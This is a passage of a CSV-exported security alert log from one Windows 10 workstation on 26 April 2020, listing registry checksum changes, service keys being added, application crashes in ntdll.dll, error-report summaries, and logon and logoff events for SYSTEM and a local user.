'7b7640c8ae985ec313fc158f04c94160aed9ba62' +", +"Apr 26, 2020 @ 10:18:32.365",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff7a3a6e38d +Faulting process id: 0xdf4 +Faulting application start time: 0x01d61bb3a5706ae0 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 8446e2b8-e3d2-41ee-bccd-ce765b635f5a +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:18:31.986",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'eb451d1c81877c08f0b9378a02b78cb8' +New md5sum is : '9a0e6860ed855c30f134fc56d8ebf295' +Old sha1sum was: '292c05defeea59b66249e8d3b66bbf630e137b4e' +New sha1sum is : 'ed3b06cd890e72527d6a9facc45f47e75ca198c0' +", +"Apr 26, 2020 @ 10:18:31.925",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:31.917",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:18:31.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:29.188",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '74049b531420855636310bdfb129d2a6' +New md5sum is : '89904bca42bd12d882afe9cb3a12bab9' +Old sha1sum was: '65b480bed22c4db304c75b2f6d15e761ed0100ff' +New sha1sum is : '42299ea8ccb144377794744777f36b2f90c289ed' +", +"Apr 26, 2020 @ 10:18:27.466",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:24.390",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '0cbc77b2e0aaa3642f8cf5e287f555fe' +New md5sum is : 'd49b1e0e5d54f0f3afc8611036d44088' +Old sha1sum was: '45fc8f588e9ab2e89be66470a3f47191a88879cd' +New sha1sum is : '67d1db6f9eb60c510bc959d4fed11edd37751205' +", +"Apr 26, 2020 @ 10:18:23.911",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:21.192",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:18:21.160",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout.""" +"Apr 26, 2020 @ 10:18:18.578",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'ec109de3886a2efd6eb1e250bf7a7b85' +New md5sum is : '928e94381124a05da64e86d6a4f0d898' +Old sha1sum was: '5d2cbc66bd22c5f71a6845fe7dacfc4b1bc32ffd' +New sha1sum is : 'fd76ddbb94c20f07eff5295a64445a1617cf28c2' +", +"Apr 26, 2020 @ 10:18:18.092",5,"GameDVR and Broadcast User Service_3ddcb terminated unexpectedly",,"""The GameDVR and Broadcast User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:17.923",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DA2.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8072.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER811F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8189.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8458.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_e071c3cc-922a-4964-b900-f5b769cb8610 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 10f4389b-df96-41b1-9c19-825ed1bc6d13 +Report Status: 268435456 +Hashed bucket: 1b46097b621a046973ba8391e6fb0c20 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:16.751",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1aa0 +Faulting application start time: 0x01d61bb3b32d948b +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 10f4389b-df96-41b1-9c19-825ed1bc6d13 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:18:15.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: 'ca35b3434e75df3b34c1d26a04166cfd' +New md5sum is : '77517218f6d65414f84259a7db1cedc3' +Old sha1sum was: '668b2e62b78990f2282cc075d2b3ccc22e99e40f' +New sha1sum is : 'dd8fed94c228cf08e019cb4c5a2ca355f7d28d19' +", +"Apr 26, 2020 @ 10:18:14.245",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:14.230",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:14.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:14.094",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:13.700",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:13.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:12.804",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:12.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:12.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:12.577",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:12.399",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '932b5dbb92394e990edc45136317decb' +New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +Old sha1sum was: '849a3d58f1f5737e890bf0a2a070ec15c475e77c' +New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +", +"Apr 26, 2020 @ 10:18:10.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:10.771",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:10.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:10.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:10.277",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:10.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:07.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:07.296",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\4' was added. +", +"Apr 26, 2020 @ 10:18:07.296",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\3' was added. +", +"Apr 26, 2020 @ 10:18:07.260",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\2' was added. +", +"Apr 26, 2020 @ 10:18:07.227",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\1' was added. +", +"Apr 26, 2020 @ 10:18:07.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:18:07.133",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:06.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +", +"Apr 26, 2020 @ 10:18:06.460",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:06.448",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:06.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '944a577bedabae60ae06cddefb7165df' +New md5sum is : '5181b4c5fa4d76f81d7fdf10f04f8fed' +Old sha1sum was: '0b905fbbc611035f372f84de2f7e227f391ae4c1' +New sha1sum is : '405074a24cd737fc537d3d10c46ed8de8efc0f53' +", +"Apr 26, 2020 @ 10:18:06.103",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd64ecd3813037bada0bfee569056567f' +New md5sum is : '2260e23b4e8cb4aab7b1510c661619d3' +Old sha1sum was: '5e4e3349a0a93949f867c623c0c0cda1be5c09c0' +New sha1sum is : 'bdb12d4d842a983afc5e8cd05ad2bd4f6d4e35a7' +", +"Apr 26, 2020 @ 10:18:06.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : '9b2eb62ca4c74330ffa1448b22e6dfac' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : '9ae0bb56b661cb86cac596f8cf95cde5c871458b' +", +"Apr 26, 2020 @ 10:18:02.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:02.943",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:17:59.972",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:17:56.459",4,"Summary event of the report's signatures",,"""Fault bucket 1610563783070951124, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER166C.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER190D.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER19D9.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A80.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AFE.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_9b4ff627d34cddc3d612adfa4c8dcd0365bb70_95f60aa5_c4b6ee39-9bf4-4ac8-9ce8-ec187f02e3e1 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 4cc55f11-32da-4e0c-abbc-57309f512e72 +Report Status: 268435456 +Hashed bucket: 9899f004d8650e352659df3a420da6d4 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:52.171",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x7b4 +Faulting application start time: 0x01d61bb3afec9653 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4cc55f11-32da-4e0c-abbc-57309f512e72 +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:17:43.633",4,"Summary event of the report's signatures",,"""Fault bucket 1169745795226003087, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765bdd03 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAED8.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF95.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB003.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB01B.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB07A.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_SecurityHealthSy_90252a4db18aef6effabc3a136419b89f51c2f7f_28e80497_92e55f6c-92cf-48cd-bb92-88e15dd67dec + +Analysis symbol: +Rechecking for solution: 0 +Report Id: c925838d-8dbd-4da0-a30f-c15c605a581a +Report Status: 268435456 +Hashed bucket: 545dc7a61a4342f5d03bc59a69f3e68f +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:37.589",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-27T10:15:09Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:17:36.741",4,"Summary event of the report's signatures",,"""Fault bucket 1837995919748689722, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: SecurityHealthSystray.exe +P2: 10.0.18362.628 +P3: 765BDD03 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTHAE67.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE68.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE79.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAEC2.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF01.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 2c2b064a-de3b-47b2-87c2-f2bec386572f +Report Status: 268435456 +Hashed bucket: c340295b095a416b1981df8d073cef3a +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:36.603",9,"Windows Application error event",,"""Faulting application name: SecurityHealthSystray.exe, version: 10.0.18362.628, time stamp: 0x765bdd03 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xc98 +Faulting application start time: 0x01d61bb3b0e56075 +Faulting application path: C:\Windows\System32\SecurityHealthSystray.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: c925838d-8dbd-4da0-a30f-c15c605a581a +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:17:36.413",4,"Summary event of the report's signatures",,"""Fault bucket 1248787444007029779, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA35F.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA592.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5F1.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA624.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6B2.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.LockAp_590ea8791e63c6d7c6582b29d38d263a1a935d_6ded9965_d1e6aede-8d06-4251-b769-a2b45e3d355e + +Analysis symbol: +Rechecking for solution: 0 +Report Id: ab48e232-7688-48f5-8a36-972e486fe08d +Report Status: 268435456 +Hashed bucket: b60fec88597a8a20815495906001cc13 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:31.467",9,"Windows Application error event",,"""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x15cc +Faulting application start time: 0x01d61bb3abd13bfb +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: ab48e232-7688-48f5-8a36-972e486fe08d +Faulting package full name: Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""" +"Apr 26, 2020 @ 10:17:20.856",4,"Summary event of the report's signatures",,"""Fault bucket 1445133708988233608, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.Windows.Cortana_1.13.0.18362_neutral_neutral_cw5n1h2txyewy +P2: praid:runtimebroker07f4358a809ac99a64a67c1 +P3: 10.0.18362.1 +P4: 4539d5a0 +P5: ntdll.dll +P6: 10.0.18362.719 +P7: 64d10ee0 +P8: c0000005 +P9: 000000000003b890 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D87.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8558.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER86D0.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER875F.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER880C.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_11cb9b8877caa9f72067315a9d734bc239156e36_fcf65235_1aa5f512-fb57-4010-aca2-3ea0030f88ad + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 35b39479-8c80-4e92-bdc6-c7341d069b33 +Report Status: 268435456 +Hashed bucket: 74de369fdf5b4d78040e2573a12fb788 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:17:18.083",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x1112D9 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:17:18.056",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x1112F9 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:17:17.920",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x1112F9 + Linked Logon ID: 0x1112D9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:17:17.885",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x1112D9 + Linked Logon ID: 0x1112F9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the 